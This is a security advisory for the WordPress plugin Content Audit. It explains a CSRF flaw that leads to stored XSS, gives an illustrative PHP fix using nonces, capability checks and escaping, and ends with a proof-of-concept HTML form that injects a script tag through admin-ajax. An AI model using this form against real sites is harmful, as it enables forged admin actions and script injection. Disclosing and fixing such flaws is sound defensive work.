CSRF/XSS in Content Audit allowing an unauthenticated attacker to do almost anything an admin can

Score: 5.8 (Medium)
Vector: Network
Complexity: Medium
Authentication: None
Confidentiality: Partial
Integrity: Partial
Availability: None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

The plugin registers an admin-ajax action that is not protected by a nonce, so a logged-in administrator can be made to submit it from a form on an attacker-controlled page (CSRF). One of the submitted values is then rendered unescaped on the Pages list in wp-admin, which turns the forged request into stored XSS.
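The pattern that closes both holes, as an added illustration for this advisory and not the Content Audit plugin's own code (before or after 1.9.2): a nonce check for the ajax action, a per-post capability check, sanitisation on input and escaping on output. The action name `example_audit_save_bulk_edit` is hypothetical; the field names are taken from the proof-of-concept form in this advisory, and using them as post-meta keys is an assumption of this example.

```php
<?php
// Added illustration for this advisory, not the Content Audit plugin's code.
// Hypothetical action name "example_audit_save_bulk_edit"; the field names come
// from the proof-of-concept form, and using them as post-meta keys is assumed.

// Fix 1 (CSRF): the admin form must carry a nonce tied to the logged-in user.
// check_ajax_referer() below reads the "_ajax_nonce" field this emits.
function example_audit_nonce_field() {
    wp_nonce_field( 'example_audit_save_bulk_edit', '_ajax_nonce' );
}

// Registered on wp_ajax_ only (no wp_ajax_nopriv_), so anonymous callers never
// reach the handler; CSRF still matters because the victim's browser attaches
// the administrator's cookies to the forged request.
add_action( 'wp_ajax_example_audit_save_bulk_edit', 'example_audit_save_bulk_edit' );

function example_audit_save_bulk_edit() {
    // Rejects any request whose nonce is missing or invalid (dies with -1).
    check_ajax_referer( 'example_audit_save_bulk_edit', '_ajax_nonce' );

    $post_ids = isset( $_POST['post_ids'] ) ? array_map( 'absint', (array) $_POST['post_ids'] ) : array();
    $fields   = array( '_content_audit_owner', '_content_audit_expiration_date', '_content_audit_notes' );

    // Fix 2a (input): strip tags and control characters before storing.
    $values = array();
    foreach ( $fields as $key ) {
        $values[ $key ] = isset( $_POST[ $key ] ) ? sanitize_text_field( wp_unslash( $_POST[ $key ] ) ) : '';
    }
    // The expiration date must be YYYY-MM-DD; anything else is dropped, not stored.
    if ( ! preg_match( '/^\d{4}-\d{2}-\d{2}$/', $values['_content_audit_expiration_date'] ) ) {
        $values['_content_audit_expiration_date'] = '';
    }

    $updated = array();
    foreach ( $post_ids as $post_id ) {
        // A nonce proves intent; a capability check proves permission on this post.
        if ( ! $post_id || ! current_user_can( 'edit_post', $post_id ) ) {
            continue;
        }
        foreach ( $values as $key => $value ) {
            update_post_meta( $post_id, $key, $value );
        }
        $updated[] = $post_id;
    }
    wp_send_json_success( array( 'updated' => $updated ) );
}

// Fix 2b (output): escape when rendering the stored value in the Pages list,
// so even a value that slipped past input sanitisation is shown as literal text.
add_filter( 'manage_page_posts_columns', 'example_audit_add_column' );
function example_audit_add_column( $columns ) {
    $columns['example_audit_notes'] = 'Audit notes';
    return $columns;
}

add_action( 'manage_page_posts_custom_column', 'example_audit_render_column', 10, 2 );
function example_audit_render_column( $column, $post_id ) {
    if ( 'example_audit_notes' !== $column ) {
        return;
    }
    echo esc_html( get_post_meta( $post_id, '_content_audit_notes', true ) );
}
```

With this in place a cross-site form like the proof of concept in this advisory stops at `check_ajax_referer()`, because the attacker's page cannot obtain a valid `_ajax_nonce` for the victim's session. The capability check is still required: a nonce only shows the request came from the plugin's own form, not that the user is allowed to edit the given post. Escaping on output is the last line of defence and should be kept even when input is sanitised, since the same meta value may be written by other code paths.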

Proof of concept

  1. Install/activate the plugin
  2. Make sure you have a post with ID=2 (or edit the HTML provided below)
  3. Settings > Content Audit > select at least “Pages” for “Audited content types”
  4. Visit a page containing the below HTML
  5. Click submit
  6. Visit http://localhost/wp-admin/edit.php?post_type=page to receive the XSS payload

    <form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=content_audit_save_bulk_edit">
     <input type="text" name="post_ids[]" value="2">
     <input type="text" name="_content_audit_owner" value="Elliot Alderson">
     <input type="text" name="_content_audit_expiration_date" value="2020-01-01">
     <input type="text" name="_content_audit_notes" value="&lt;script>alert(1)&lt;/script>">
     <input type="submit">
    </form>
Mitigation/further actions

Upgrade to version 1.9.2 or later.